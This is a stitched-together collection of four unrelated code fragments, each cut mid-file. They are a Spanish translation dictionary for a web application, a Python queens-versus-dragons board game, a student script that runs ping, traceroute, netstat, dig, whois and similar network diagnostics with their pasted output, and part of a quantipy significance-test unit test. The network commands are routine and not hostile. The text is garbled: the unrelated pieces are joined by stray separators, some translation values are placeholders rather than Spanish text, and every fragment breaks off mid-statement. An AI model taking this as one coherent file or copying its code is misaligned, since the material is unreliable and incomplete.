'invalid request': 'solicitud inválida',
'Invalid reset password': '<PASSWORD>',
'invalid ticket': 'tiquete inválido',
'Invalid username': 'Nombre usuario no válido',
'Is Active': 'Está Activo',
'Iso Code': 'Iso Code',
'JSON': 'JSON',
'JSON export of visible columns': 'JSON exportar columnas visibles',
'Key': 'Llave',
'Kit': 'Kit',
'Kit comp.': 'Kit comp.',
'Kit Destino': 'Kit Destino',
'Kit Origen': 'Kit Origen',
'Kitds': 'Kitds',
'Kits': 'Kits',
'Kits afectados': 'Kits afectados',
'Kits copiar': 'Kits copiar',
'Kits de la ubicación': 'Kits de la ubicación',
'Kits filtrados': 'Kits filtrados',
'Kits por Ubicacion': 'Kits por Ubicacion',
'Kits por ubicación': 'Kits por ubicación',
'Kits totales': 'Kits totales',
'la configuración debe ser de último nivel': 'la configuración debe ser de último nivel',
'Language Code': 'Language Code',
'language file "%(filename)s" created/updated': 'archivo de lenguaje "%(filename)s" creado/actualizado',
'Language files (static strings) updated': 'Archivos de lenguaje (cadenas estáticas) actualizados',
'languages': 'lenguajes',
'Languages': 'Lenguajes',
'languages updated': 'lenguajes actualizados',
'Last name': 'Apellido',
'Last read': 'Última lectura',
'Last saved on:': 'Guardado en:',
'Layout': 'Diseño de página',
'Layout Plugins': 'Plugins de diseño',
'Layouts': 'Diseños de páginas',
'lecturas.descuadre': 'lecturas.descuadre',
'lecturas.M_Retirado': 'lecturas.M_Retirado',
'lecturas.VP_Billetes': 'lecturas.VP_Billetes',
'lecturas.VP_DineroHucha': 'lecturas.VP_DineroHucha',
'lecturas.VP_DispManual': 'lecturas.VP_DispManual',
'lecturas.VP_LlenadoManual': 'lecturas.VP_LlenadoManual',
'lecturas.VP_ValorVentas': 'lecturas.VP_ValorVentas',
'Level': 'Level',
'Lft': 'Lft',
'License for': 'Licencia para',
'List': 'Lista',
'Live Chat': 'Chat en vivo',
'loading...': 'cargando...',
'Locked': 'Bloqueado',
'Log In': 'Entrar',
'Log Out': 'Salir',
'Logged in': 'Sesión iniciada',
'Logged out': 'Sesión finalizada',
'Login': 'Inicio de sesión',
'login': 'inicio de sesión',
'Login disabled by administrator': 'Inicio de sesión deshabilitado por el administrador',
'Login to the Administrative Interface': 'Inicio de sesión para la Interfaz Administrativa',
'logout': 'fin de sesión',
'Logout': 'Fin de sesión',
'Lost Password': '<PASSWORD>',
'Lost password?': '¿Olvidó la contraseña?',
'lost password?': '¿olvidó la contraseña?',
'M Retirado': 'Retirado',
'M_Retirado': 'Retirado',
'Mac': 'MAC',
'Machine': 'Máquina',
'Machine history added': 'Instalación añadida',
'Machine Installations history': 'Historial de instalaciones de máquina',
'Machine not exits': '',
'Machine read added': 'Lectura de máquina creada',
'Machine read upload': 'Subida de lectura de máquina',
'Machine reading added': 'lectura de máquina creada',
'machines': 'máquinas',
'Machines': 'Máquinas',
'Machines reading pendant': 'Maquinas pendientes de lectura',
'Machines#': 'Num.Máquinas',
'machines_installs': 'Instalaciones de máquina',
'Main Menu': 'Menú principal',
'Main Site': 'Main Site',
'Manage Cache': 'Gestionar la Caché',
'Manual': 'Manual',
'Manual down': 'Descarga manual',
'Manual fill': 'Llenado manual',
'Maquina': 'Máquina',
'Maquinas': 'Maquinas',
'Matriz': 'Matriz',
'Membresía': 'Membresía',
'Menu Model': 'Modelo "menu"',
'merge': 'combinar',
'Mod': 'Mod',
'Mod Atr': 'Mod Atr',
'Mod Tipo': 'Mod Tipo',
'Mod Tipo Ori': 'Mod Tipo Ori',
'Mod Um': 'Mod Um',
'Mod Val Def': 'Mod Val Def',
'Mod Val Def Vis': 'Mod Val Def Vis',
'Model': 'Modelo',
'Models': 'Modelos',
'models': 'modelos',
'Modificar': 'Modificar',
'Modificar en lote...': 'Modificar en lote...',
'Modified By': 'Modificado Por',
'Modified On': 'Modificado En',
'Modules': 'Módulos',
'modules': 'módulos',
'Modulos': 'Modulos',
'Movido': 'Movido',
'Must be DD/MM/YYYY!': 'Debe ser DD/MM/YYYY!',
'Must be MM-DD-YYYY!': 'debe ser MM-DD-YYYY!',
'Must be MM/DD/YYYY!': 'debe ser MM/DD/YYYY!',
'must be YYYY-MM-DD HH:MM:SS!': '¡debe ser DD/MM/YYYY HH:MM:SS!',
'must be YYYY-MM-DD!': '¡debe ser DD/MM/YYYY!',
'Must ben MM-DD-YYYY!': 'Debe ser MM-DD-YYYY!',
'My Sites': 'Mis Sitios',
'Mínimo de Kits necesarios': 'Mínimo de Kits necesarios',
'Mínimo de módulos necesarios': 'Mínimo de módulos necesarios',
'Módulo': 'Módulo',
'Módulo comp.': 'Módulo comp.',
'Módulo componente introducido es contenedor del módulo padre': 'Módulo componente introducido es contenedor del módulo padre',
'Módulo Destino': 'Módulo Destino',
'Módulo no puede estar vacío': 'Módulo no puede estar vacío',
'Módulo Origen': 'Módulo Origen',
'Módulos': 'Módulos',
'Name': 'Nombre',
'Naves': 'Naves',
'new': 'nuevo',
'New': 'Nuevo',
'New %(entity)s': 'Nuevo %(entity)s',
'new application "%s" created': 'nueva aplicación "%s" creada',
'New password': '<PASSWORD>',
'New Record': 'Registro nuevo',
'new record inserted': 'nuevo registro insertado',
'New Search': 'Añadir condición',
'Next': 'Next',
'next %s rows': 'siguientes %s registros',
'next 100 rows': '100 filas siguientes',
'Ninguno seleccionado': 'Ninguno seleccionado',
'Nivel': 'Nivel',
'No account yet?': '¿No tiene cuenta todavía?',
'No autorizado': 'No autorizado',
'No cambiar': 'No cambiar',
'No databases in this application': 'No hay bases de datos en esta aplicación',
'No eliminable': 'No eliminable',
'No está en Rango de valores': 'No está en Rango de valores',
'No está en rango de valores': 'No está en rango de valores',
'No records found': 'No se han encontrado registros',
'Node Type': 'Node Type',
'Normal': 'Normal',
'Not authorized': 'No autorizado',
'not authorized': 'no autorizado',
'Not Authorized': 'NO AUTORIZADO',
'Not exists': 'Not exists',
'not in': 'no en',
'Nuevo': 'Nuevo',
'Numero': 'Numero',
'Numeroserie': 'Numero Serie',
'O.T. Comodín no encontrada': 'O.T. Comodín no encontrada',
'O.T. Comodín of:1 t:9060019 no encontrada': 'O.T. Comodín of:1 t:9060019 no encontrada',
'Object or table name': 'Nombre del objeto o tabla',
'Observaciones': 'Observaciones',
'OK': 'OK',
'Old password': '<PASSWORD>',
'Online book': 'Libro en línea',
'Online examples': 'Ejemplos en | |
<gh_stars>0
# A2
# <NAME>
import copy as cp
import time as time
# Tokens for Queens, Dragons and Pawns -------
# @Type - queen, dragon or pawn
# @Alive - True if the token is alive
# __str__ - Returns 'Q','D','P' for each valid type
class token:
def __init__(self, thing):
self.type = thing
self.alive = True
def __str__(self):
if self.type == 'dragon':
return 'D'
elif self.type == 'queen':
return 'Q'
elif self.type == 'pawn':
return 'P'
else:
return '0'
# Testing Github Repo
# Useful Functions -------------------
# @Thing - any valid object
# Return - True if object is of class Token
def isToken(thing):
return isinstance(thing, token)
# @Thing - any valid object
# Return - True if object is of class Token with type dragon
def isDragon(thing):
if isToken(thing):
return thing.type == 'dragon'
else:
return False
# @Thing - any valid object
# Return - True if object is of class Token with type queen
def isQueen(thing):
if isToken(thing):
return thing.type == 'queen'
else:
return False
# @Thing - any valid object
# Return - True if object is of class Token with type pawn
def isPawn(thing):
if isToken(thing):
return thing.type == 'pawn'
else:
return False
# @Thing - any valid object
# @Foe - any valid object
# Return - True if two parameters are tokens of opposite teams
def isEnemy(thing, foe):
if isPawn(thing) and (isDragon(foe) or isQueen(foe)):
return True
elif isPawn(foe) and (isDragon(thing) or isQueen(thing)):
return True
else:
return False
# @m1 - tuple of coordinates
# @m2 - tuple of coordinates
# Returns True if m2 is one square diagonally in any direction of m1
def isDiagonal(m1, m2):
if (abs(m1[0] - m2[0]) == 1) and (abs(m1[1] - m2[1]) == 1):
return True
else:
return False
# @m1 - tuple of coordinates
# @m2 - tuple of coordinates
# Returns True if m2 is one square in any cartesional direction of m1
def isStraight(m1, m2):
if ((abs(m1[0] - m2[0]) == 1) and (abs(m1[1] - m2[1]) == 0)) or\
((abs(m1[0] - m2[0]) == 0) and (abs(m1[1] - m2[1]) == 1)):
return True
else:
return False
# @stringState - string of 25 chars
# Returns a 5x5 list of lists of stringState
# TODO add a check for 25 chars
def strToState(stringState):
lx = 0
mx = 5
xList = []
yList = []
for K in range(5):
for J in range(lx, mx):
xList += stringState[J]
yList.append(xList)
xList = []
lx += 5
mx += 5
return yList
# Game State and Related functions -----------
class game:
def __init__(self, board=[[1], [1]], player=1):
self.x = 5
self.y = 5
# Token Area
self.q = token('queen')
self.d = [token('dragon') for c in range(3)]
self.p = [token('pawn') for c in range(5)]
# Board area
if board == [[1], [1]]:
self.board = [[0 for y in range(5)] for x in range(5)]
self.board[2][0] = self.q
self.board[1][1] = self.d[1]
self.board[2][1] = self.d[2]
self.board[3][1] = self.d[0]
self.board[0][4] = self.p[1]
self.board[1][4] = self.p[2]
self.board[2][4] = self.p[3]
self.board[3][4] = self.p[4]
self.board[4][4] = self.p[0]
else:
self.board = board
# Human and AI Player Area
self.wights = 1
self.queens = 2
self.whoseTurn = player
self.wightsScore = 0
self.queensScore = 0
self.humanPlayer = 2
self.AIPlayer = 1
self.cachedWinner = False
self.cachedWin = False
# SETUP FUNCTIONS ---------------------------------
def initPlayers(self, Human=False):
# TODO Add human Toggle
if Human:
return self.wights
# Human Input Functions ----------------------------
# Game initiation function. Denotes who the Human shall play
def selectPlayer(self):
player = input("Select P1 or P2: ")
if player == "P1":
self.humanPlayer = 1
self.AIPlayer = 2
elif player == "P2":
self.humanPlayer = 2
self.AIPlayer = 1
# @input - Asks for humans token coordinate
# @input - Asks for a square to move them to
# Returns the resultant state
def inputMove(self):
legalMove = False
while not legalMove:
start = tuple(int(x.strip()) for x in input("Who do you want to move? ").split(','))
print('Thats a ', self.board[start[0]][start[1]])
end = tuple(int(x.strip()) for x in input("Where do you want to move them?").split(','))
legalMove = self.makeMove(start, end)
if isinstance(legalMove, game):
legalMove.whoseTurn = self.togglePlayer()
return legalMove
# GAME PLAY FUNCTIONS ------------------------------
# @Modify - Whoseturn Alternate
def togglePlayer(self):
if self.whoseTurn == 1:
self.whoseTurn = 2
return cp.deepcopy(self.whoseTurn)
else:
self.whoseTurn = 1
return cp.deepcopy(self.whoseTurn)
# Return - True if Wights turn
def isMinNode(self):
if self.whoseTurn == 2:
# player 1 min
return True
else:
# player 2 min
return False
# Return - True if Queens turn
def isMaxNode(self):
if self.whoseTurn == 1:
# player 1 max
return True
else:
# player 2 max
return False
# Returns - Positive value for Queens win,
# - Negative for Wights win
# - 0 for game in progress
def winFor(self):
# Queen is Dead
if self.q.alive is False:
self.cachedWin = True
self.cachedWinner = self.wights
return -200
else:
x = False
for i in range(5):
if isQueen(self.board[i][4]):
x = True
if x:
self.cachedWin = True
self.cachedWinner = self.queens
return 200
else:
return 0
# Returns - True if gamestate is either a win or draw for either player
# TODO - All pawns dieing is kinda an issue
def isTerminal(self):
qAlive = False
x = False
for i in self.board:
for j in i:
if isQueen(j):
qAlive = j.alive
for i in range(5):
if isQueen(self.board[i][4]):
x = True
return (not qAlive) or x
# See winFor
def utility(self):
return self.winFor()
# Returns a new copy of board
def getBoard(self):
return cp.deepcopy(self.board)
# DISPLAY FUNCTIONS -----------------------------
# Pretty display
def display(self):
print('')
for i in range(5):
for j in range(5):
print(self.board[j][i], end='')
print('')
# Debugging display
def __str__(self):
s = ''
for i in range(self.y):
for j in range(self.x):
s += str(self.board[j][i])
return s
# Returns a string of current state
# Note - Deconversion comes from Useful functions - strToState()
def str(self):
s = ''
for i in range(self.y):
for j in range(self.x):
s += str(self.board[j][i])
return s
# MOVEMENT FUNCTIONS -----------------------------
# @m - Coordinate on board
# Return - All adjacent moves
def nextAvailableMoves(self, m):
x1 = m[0]
y1 = m[1]
# 1 Free Movement
if 0 < x1 < 4 and 0 < y1 < 4:
return {(x1, y1 - 1), (x1 - 1, y1), (x1 + 1, y1), (x1, y1 + 1),
(x1 - 1, y1 - 1), (x1 - 1, y1 + 1), (x1 + 1, y1 - 1), (x1 + 1, y1 + 1)}
# 2 Can't Go NegX
elif x1 == 0 and 0 < y1 < 4:
return {(x1, y1 - 1), (x1 + 1, y1), (x1, y1 + 1), (x1 + 1, y1 - 1), (x1 + 1, y1 + 1)}
# 3 Can't go PosX
elif x1 == 4 and 0 < y1 < 4:
return {(x1, y1 - 1), (x1 - 1, y1), (x1, y1 + 1), (x1 - 1, y1 - 1), (x1 - 1, y1 + 1)}
# 4 Can't go NegY
elif 0 < x1 < 4 and y1 == 0:
return {(x1 - 1, y1), (x1 + 1, y1), (x1, y1 + 1), (x1 - 1, y1 + 1), (x1 + 1, y1 + 1)}
# 5 Can't go PosY
elif 0 < x1 < 4 and y1 == 4:
return {(x1, y1 - 1), (x1 - 1, y1), (x1 + 1, y1), (x1 - 1, y1 - 1), (x1 + 1, y1 - 1)}
# 6 Can't go NegX or NegY
elif x1 == 0 and y1 == 0:
return {(x1 + 1, y1), (x1, y1 + 1), (x1 + 1, y1 + 1)}
# 7 Can't go NegX or PosY
elif x1 == 0 and y1 == 4:
return {(x1, y1 - 1), (x1 + 1, y1), (x1 + 1, y1 - 1)}
# 8 Can't go PosX or PosY
elif x1 == 4 and y1 == 4:
return {(x1, y1 - 1), (x1 - 1, y1), (x1 - 1, y1 - 1)}
# 9 Can't go PosX or NegY
elif x1 == 4 and y1 == 0:
return {(x1 - 1, y1), (x1, y1 | |
#!/usr/bin/env python3
#! @author: @ruhend(<NAME>)
#! Assignment 5
#! Network Commands
import subprocess
command = [ "ping -c 5 www.google.com",
"traceroute www.google.com",
"telnet www.www.google.com 443",
"ifconfig",
"netstat",
"ifconfig",
"dig www.google.com",
"nslookup www.google.com",
"whois www.google.com" ]
# These commands would work only if the binary is available.
for i in command:
print("**********************")
print(i)
process = subprocess.Popen(i.split())
op, er = process.communicate()
print("> "+str(er))
#! OUTPUT
# **********************
# ping -c 5 www.google.com
# PING www.google.com (172.16.58.3): 56 data bytes
# 64 bytes from 172.16.58.3: icmp_seq=0 ttl=54 time=38.735 ms
# 64 bytes from 172.16.58.3: icmp_seq=1 ttl=54 time=36.221 ms
# 64 bytes from 172.16.58.3: icmp_seq=2 ttl=54 time=38.962 ms
# 64 bytes from 172.16.58.3: icmp_seq=3 ttl=54 time=37.588 ms
# 64 bytes from 172.16.58.3: icmp_seq=4 ttl=54 time=30.758 ms
# --- www.google.com ping statistics ---
# 5 packets transmitted, 5 packets received, 0.0% packet loss
# round-trip min/avg/max/stddev = 30.758/36.453/38.962/3.009 ms
# > None
# **********************
# traceroute www.google.com
# traceroute to www.google.com (172.16.58.3), 64 hops max, 52 byte packets
# 1 192.168.245.35 (192.168.245.35) 2.478 ms 2.046 ms 1.957 ms
# 2 192.168.0.1 (192.168.0.1) 5.785 ms 5.339 ms 5.780 ms
# 3 10.210.0.1 (10.210.0.1) 15.711 ms 33.363 ms 30.219 ms
# 4 172.16.58.3 (172.16.58.3) 18.892 ms 19.278 ms 20.490 ms
# 5 172.16.31.10 (172.16.31.10) 20.446 ms 24.005 ms 20.509 ms
# 6 172.16.17.32 (172.16.17.32) 20.472 ms 17.917 ms 16.021 ms
# 7 10.241.1.6 (10.241.1.6) 19.072 ms 20.082 ms 22.452 ms
# 8 10.240.254.100 (10.240.254.100) 19.325 ms 25.724 ms 26.737 ms
# 9 10.240.254.1 (10.240.254.1) 31.239 ms 24.672 ms 22.923 ms
# 10 10.241.1.1 (10.241.1.1) 20.272 ms 40.104 ms 28.003 ms
# 11 172.16.58.3.static.jio.com (172.16.58.3) 44.805 ms 28.655 ms 23.416 ms
# 12 * * *
# 13 * * *
# 14 192.168.3.11 (192.168.3.11) 68.625 ms 35.987 ms
# 172.16.31.10 (172.16.31.10) 39.474 ms
# 15 192.168.127.12 (192.168.127.12) 43.252 ms * *
# 16 172.16.17.32 (172.16.17.32) 35.864 ms
# 192.168.3.11 (192.168.3.11) 30.421 ms
# 192.168.3.11 (192.168.3.11) 32.849 ms
# 17 172.16.58.3 (172.16.58.3) 28.856 ms
# maa05s15-in-f4.1e100.net (142.250.77.100) 35.301 ms 40.754 ms
# > None
# **********************
# telnet www.www.google.com 443
# www.www.google.com: nodename nor servname provided, or not known
# > None
# **********************
# ifconfig
# lo0: flags=8049<UP,LOOPBACK,RUNNING,MULTICAST> mtu 16384
# options=1203<RXCSUM,TXCSUM,TXSTATUS,SW_TIMESTAMP>
# inet 127.0.0.1 netmask 0xff000000
# inet6 ::1 prefixlen 128
# inet6 fe80::1%lo0 prefixlen 64 scopeid 0x1
# nd6 options=201<PERFORMNUD,DAD>
# gif0: flags=8010<POINTOPOINT,MULTICAST> mtu 1280
# stf0: flags=0<> mtu 1280
# XHC20: flags=0<> mtu 0
# utun0: flags=8051<UP,POINTOPOINT,RUNNING,MULTICAST> mtu 1380
# inet6 fe80::5252:dbe:6a2f:3513%utun0 prefixlen 64 scopeid 0x5
# nd6 options=201<PERFORMNUD,DAD>
# utun1: flags=8051<UP,POINTOPOINT,RUNNING,MULTICAST> mtu 2000
# inet6 fe80::6377:ae36:1ccb:2c7d%utun1 prefixlen 64 scopeid 0x6
# nd6 options=201<PERFORMNUD,DAD>
# en2: flags=8863<UP,BROADCAST,SMART,RUNNING,SIMPLEX,MULTICAST> mtu 1500
# options=400<CHANNEL_IO>
# ether 2e:08:64:f1:52:bf
# inet6 fe80::8c8:de31:3987:fc73%en2 prefixlen 64 secured scopeid 0x8
# inet 192.168.245.156 netmask 0xffffff00 broadcast 192.168.245.255
# nd6 options=201<PERFORMNUD,DAD>
# media: autoselect
# status: active
# > None
# **********************
# netstat
# Active Internet connections
# Proto Recv-Q Send-Q Local Address Foreign Address (state)
# tcp4 0 0 192.168.245.156.55554 whatsapp-cdn-shv.https ESTABLISHED
# tcp4 0 0 192.168.245.156.55393 ec2-52-5-133-92..https ESTABLISHED
# tcp4 0 0 192.168.245.156.55277 ec2-44-227-165-1.https ESTABLISHED
# tcp4 0 0 192.168.245.156.54721 server-13-35-238.https ESTABLISHED
# tcp4 0 0 192.168.245.156.54316 172.16.17.32.https ESTABLISHED
# tcp4 0 0 192.168.245.156.54123 sa-in-f108.1e100.imaps ESTABLISHED
# tcp4 0 0 192.168.245.156.54116 sa-in-f108.1e100.imaps ESTABLISHED
# tcp4 0 0 192.168.245.156.54115 sa-in-f108.1e100.imaps ESTABLISHED
# tcp4 0 0 192.168.245.156.54114 172.16.31.10.b.https ESTABLISHED
# tcp4 0 0 192.168.245.156.53202 192.168.3.11.https ESTABLISHED
# tcp4 0 0 192.168.245.156.52838 192.168.3.11.https ESTABLISHED
# tcp4 0 0 192.168.245.156.50577 172.16.58.3.b.https ESTABLISHED
# tcp4 0 0 192.168.245.156.50335 sd-in-f188.1e100.https ESTABLISHED
# tcp4 0 0 192.168.245.156.50334 ec2-18-205-93-20.https ESTABLISHED
# tcp4 0 0 192.168.245.156.50331 maa05s12-in-f14..http ESTABLISHED
# tcp4 0 0 192.168.245.156.50172 ec2-52-202-62-22.https ESTABLISHED
# tcp4 0 0 192.168.245.156.50163 192.168.3.11.https ESTABLISHED
# tcp4 0 0 192.168.245.156.49925 172.16.31.1016.5223 ESTABLISHED
# tcp4 0 0 localhost.46624 localhost.55525 TIME_WAIT
# tcp4 0 0 localhost.46624 localhost.55526 TIME_WAIT
# tcp4 0 0 localhost.55030 localhost.46624 TIME_WAIT
# tcp4 0 0 192.168.245.156.54138 172.16.31.10.b.https TIME_WAIT
# tcp4 0 0 localhost.46624 localhost.55548 TIME_WAIT
# tcp4 0 0 localhost.46624 localhost.55549 TIME_WAIT
# tcp4 0 0 localhost.46624 localhost.55572 TIME_WAIT
# tcp4 0 0 localhost.46624 localhost.55573 TIME_WAIT
# tcp4 0 0 localhost.46624 localhost.55590 TIME_WAIT
# tcp4 0 0 localhost.46624 localhost.55591 TIME_WAIT
# tcp4 0 0 localhost.46624 localhost.55612 TIME_WAIT
# tcp4 0 0 localhost.46624 localhost.55613 TIME_WAIT
# tcp4 0 0 localhost.46624 localhost.55634 TIME_WAIT
# tcp4 0 0 localhost.46624 localhost.55635 TIME_WAIT
# tcp4 0 0 localhost.46624 localhost.55657 TIME_WAIT
# tcp4 0 0 localhost.46624 localhost.55658 TIME_WAIT
# tcp4 0 0 localhost.46624 localhost.55663 TIME_WAIT
# udp4 0 0 192.168.245.156.53051 *.*
# udp4 0 0 192.168.245.156.57620 maa03s40-in-f10..https
# udp4 0 0 *.* *.*
# udp46 0 0 *.* *.*
# udp4 0 0 *.* *.*
# udp6 0 0 *.mdns *.*
# udp4 0 0 *.mdns *.*
# udp4 0 0 *.netbios-dgm *.*
# udp4 0 0 *.netbios-ns *.*
# Active Multipath Internet connections
# Proto/ID Flags Local Address Foreign Address (state)
# icm6 0 0 *.* *.*
# Active LOCAL (UNIX) domain sockets
# Address Type Recv-Q Send-Q Inode Conn Refs Nextref Addr
# 5264b0a3969d9ded stream 0 0 0 5264b0a3969d9d25 0 0 /var/run/mDNSResponder
# 5264b0a3969d9d25 stream 0 0 0 5264b0a3969d9ded 0 0
# 5264b0a3969d803d stream 0 0 0 5264b0a3969d7f75 0 0 /var/run/mDNSResponder
# 5264b0a3969d7f75 stream 0 0 0 5264b0a3969d803d 0 0
# 5264b0a3938a093d stream 0 0 5264b0a397538315 0 0 0 /var/<KEY>/.WhatsApp.cZpxak/SS
# 5264b0a3938a0c5d stream 0 0 0 5264b0a3938a0b95 0 0
# 5264b0a3938a0b95 stream 0 0 0 5264b0a3938a0c5d 0 0
# 5264b0a3938a02fd stream 0 0 0 5264b0a39389e7a5 0 0
# 5264b0a39389e7a5 stream 0 0 0 5264b0a3938a02fd 0 0
# 5264b0a3969d79fd stream 0 0 0 5264b0a3969d7935 0 0 /var/run/mDNSResponder
# 5264b0a3969d7935 stream 0 0 0 5264b0a3969d79fd 0 0
# 5264b0a3969da4f5 stream 0 0 0 5264b0a3969da42d 0 0
# 5264b0a3969da42d stream 0 0 0 5264b0a3969da4f5 0 0
# 5264b0a3969da365 stream 0 0 0 5264b0a3969da29d 0 0
# 5264b0a3969da29d stream 0 0 0 5264b0a3969da365 0 0
# 5264b0a3969da045 stream 0 0 0 5264b0a3969d9f7d 0 0
# 5264b0a3969d9f7d stream 0 0 0 5264b0a3969da045 0 0
# 5264b0a3969d9eb5 stream 0 0 0 5264b0a3938a0ded 0 0
# 5264b0a3938a0ded stream 0 0 0 5264b0a3969d9eb5 0 0
# 5264b0a3969d7b8d stream 0 0 0 5264b0a3969d7ac5 0 0 /var/folders/5p/2y6w9nfd4w3fl0vp97b1w_cc0000gn/T/CoreFxPipe_vscode.a01785ad790b74fd8ca4bcbca323cd37
# 5264b0a3969d7ac5 stream 0 0 0 5264b0a3969d7b8d 0 0
# 5264b0a39389e86d stream 0 0 5264b0a393a1e915 0 0 0 /var/<KEY>/CoreFxPipe_vscode.a01785ad790b74fd8ca4bcbca323cd37
# 5264b0a39389fcbd stream 0 0 5264b0a3973b1315 0 0 0 /var/folders/5p/2y6w9nfd4w3fl0vp97b1w_cc0000gn/T/dotnet-diagnostic-3990-1631870240-socket
# 5264b0a3938a0235 stream 0 0 0 5264b0a3938a0acd 0 0
# 5264b0a3938a0acd stream 0 0 0 5264b0a3938a0235 0 0
# 5264b0a3969d948d stream 0 0 0 5264b0a3969d9235 0 0
# 5264b0a3969d9235 stream 0 0 0 5264b0a3969d948d 0 0
# 5264b0a3969d90a5 stream 0 0 0 5264b0a3969d8fdd 0 0
# 5264b0a3969d8fdd stream 0 0 0 5264b0a3969d90a5 0 0
# 5264b0a39389fd85 stream 0 0 5264b0a3973b1415 0 0 0 /var/folders/5p/2y6w9nfd4w3fl0vp97b1w_cc0000gn/T/CoreFxPipe_f3e70055d3c346c989cd650448fde7d2
# 5264b0a3969d7d1d stream 0 0 0 5264b0a3969d7c55 0 0 /var/folders/5p/2y6w9nfd4w3fl0vp97b1w_cc0000gn/T/vscode-efbd5f63fa08af9a19f9c24f817de1d97dd704e1.sock
# 5264b0a3969d7c55 stream 0 0 0 5264b0a3969d7d1d 0 0
# 5264b0a3969da1d5 stream 0 0 0 5264b0a3969da10d 0 0
# 5264b0a3969da10d stream 0 0 0 5264b0a3969da1d5 0 0
# 5264b0a3938a0a05 stream 0 0 0 5264b0a3938a06e5 0 0 /var/folders/5p/2y6w9nfd4w3fl0vp97b1w_cc0000gn/T/vscode-5de46037824cb4b3aeff4ae54c5cc54c1556632e.sock
# 5264b0a3938a06e5 stream 0 0 0 5264b0a3938a0a05 0 0
# 5264b0a3938a14f5 stream 0 0 0 5264b0a3938a142d 0 0
# 5264b0a3938a142d stream 0 0 0 5264b0a3938a14f5 0 0
# 5264b0a3938a11d5 stream 0 0 0 5264b0a3938a110d 0 0
# 5264b0a3938a110d stream 0 0 0 5264b0a3938a11d5 0 0
# 5264b0a3938a1045 stream 0 0 0 5264b0a3938a048d 0 0
# 5264b0a3938a048d stream 0 0 0 5264b0a3938a1045 0 0
# 5264b0a39389fa65 stream 0 0 0 5264b0a39389e935 0 0
# 5264b0a39389e935 stream 0 0 0 5264b0a39389fa65 0 0
# 5264b0a39389e615 stream 0 0 5264b0a397384915 0 0 0 /var/folders/5p/2y6w9nfd4w3fl0vp97b1w_cc0000gn/T/vscode-5de46037824cb4b3aeff4ae54c5cc54c1556632e.sock
# 5264b0a3938a0d25 stream 0 0 5264b0a3969e3a15 0 0 0 /var/folders/5p/2y6w9nfd4w3fl0vp97b1w_cc0000gn/T/vscode-git-0dd8e09022.sock
# 5264b0a3938a1365 stream 0 0 0 5264b0a3938a129d 0 0 /var/run/mDNSResponder
# 5264b0a3938a129d stream 0 0 0 5264b0a3938a1365 0 0
# 5264b0a39389f99d stream 0 0 0 5264b0a39389f8d5 0 0
# 5264b0a39389f8d5 stream 0 0 0 5264b0a39389f99d 0 0
# 5264b0a3938a0875 stream 0 0 0 5264b0a3938a07ad 0 0
# 5264b0a3938a07ad stream 0 0 0 5264b0a3938a0875 0 0
# 5264b0a3938a016d stream 0 0 0 5264b0a3938a00a5 0 0 /var/run/mDNSResponder
# 5264b0a3938a00a5 stream 0 0 0 5264b0a3938a016d 0 0
# 5264b0a39389f67d stream 0 0 0 5264b0a39389f5b5 0 0
# 5264b0a39389f5b5 stream 0 0 0 5264b0a39389f67d 0 0
# 5264b0a39389f425 stream 0 0 0 5264b0a39389f295 0 0 /var/folders/5p/2y6w9nfd4w3fl0vp97b1w_cc0000gn/T/vscode-ipc-563afa84-ef7c-45dd-bd14-65fb71fae75a.sock
# 5264b0a39389f295 stream 0 0 0 5264b0a39389f425 0 0
# 5264b0a39389f1cd stream 0 0 0 5264b0a39389f105 0 0
# 5264b0a39389f105 stream 0 0 0 5264b0a39389f1cd 0 0
# 5264b0a39389f03d stream 0 0 0 5264b0a39389ef75 0 0
# 5264b0a39389ef75 stream 0 0 0 5264b0a39389f03d 0 0
# 5264b0a39389eead stream 0 0 0 5264b0a39389ede5 0 0
# 5264b0a39389ede5 stream 0 0 0 5264b0a39389eead 0 0
# 5264b0a39389ed1d stream 0 0 0 5264b0a39389ec55 0 0
# 5264b0a39389ec55 stream 0 0 0 5264b0a39389ed1d 0 0
# 5264b0a39389eb8d stream 0 0 0 5264b0a39389eac5 | |
}
}
})
mean_sig.add_method(name='DIM_means_test',
kwargs={'text': 'SIG (means)'})
self.stack.add_link(data_keys='testing', x=x, y=y,
views=mean_sig, weights='weight_a')
view = self.stack['testing']['no_filter'][x][y]['x|t.means.Dim.05|x:||weight_a|DIM_means_test']
meta = self.stack['testing']['no_filter'][x][y]['x|t.means.Dim.05|x:||weight_a|DIM_means_test'].meta()
sig_result = [['NONE', 'NONE', 'NONE', '[1, 2]', '[1, 2, 3]']]
meta_siglevel = 0.05
self.assertEqual(view.dataframe.replace(np.NaN, 'NONE').values.tolist(),
sig_result)
self.assertEqual(view.is_meanstest(), meta_siglevel)
def test_means_test_level_20_weighted_no_missings(self):
views = QuantipyViews(['counts', 'cbase'])
x = 'q5_1'
y = 'locality'
self.setup_stack(
views=views,
x=x,
y=y,
weights='weight_a'
)
means = ViewMapper(
template={
'method': QuantipyViews().descriptives,
'kwargs': {}
})
means.add_method(name='excl_9798',
kwargs={'text': '(no missings))',
'exclude': [97, 98],
'axis': 'x'})
self.stack.add_link(data_keys='testing', x=x, y=y,
views=means.subset('excl_9798'), weights='weight_a')
mean_sig = ViewMapper(
template={
'method': QuantipyViews().coltests,
'kwargs': {
'metric': 'means',
'stack': self.stack,
'iterators': {
'level': [0.20]
}
}
})
mean_sig.add_method(name='DIM_means_test',
kwargs={'text': 'SIG (means)'})
self.stack.add_link(data_keys='testing', x=x, y=y,
views=mean_sig, weights='weight_a')
view = self.stack['testing']['no_filter'][x][y]['x|t.means.Dim.20|x[{1,2,3,4,5}]:||weight_a|DIM_means_test']
meta = self.stack['testing']['no_filter'][x][y]['x|t.means.Dim.20|x[{1,2,3,4,5}]:||weight_a|DIM_means_test'].meta()
sig_result = [['NONE', '[1, 3]', 'NONE', 'NONE', 'NONE']]
meta_siglevel = 0.20
self.assertEqual(view.dataframe.replace(np.NaN, 'NONE').values.tolist(),
sig_result)
self.assertEqual(view.is_meanstest(), meta_siglevel)
def test_means_test_level_10_unweighted_ovlp_no_missings(self):
views = QuantipyViews(['counts', 'cbase'])
x = 'q5_1'
y = 'q3'
self.setup_stack(
views=views,
x=x,
y=y
)
means = ViewMapper(
template={
'method': QuantipyViews().descriptives,
'kwargs': {}
})
means.add_method(name='excl_9798',
kwargs={'text': '(no missings))',
'exclude': [97, 98],
'axis': 'x'})
self.stack.add_link(data_keys='testing', x=x, y=y,
views=means.subset('excl_9798'))
mean_sig = ViewMapper(
template={
'method': QuantipyViews().coltests,
'kwargs': {
'metric': 'means',
